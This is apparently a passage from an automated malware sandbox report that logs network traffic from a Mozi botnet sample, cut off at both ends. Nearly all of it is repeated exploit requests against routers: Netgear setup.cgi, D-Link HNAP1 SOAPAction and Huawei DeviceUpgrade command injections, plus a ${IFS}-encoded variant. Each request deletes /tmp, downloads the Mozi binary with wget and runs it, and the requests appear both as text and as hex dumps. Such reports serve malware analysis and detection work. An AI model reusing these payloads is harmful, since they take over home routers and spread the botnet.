3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.65.120.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 35.244.243.215:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 146.158.12.4:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 157.245.223.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.7.8.12:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 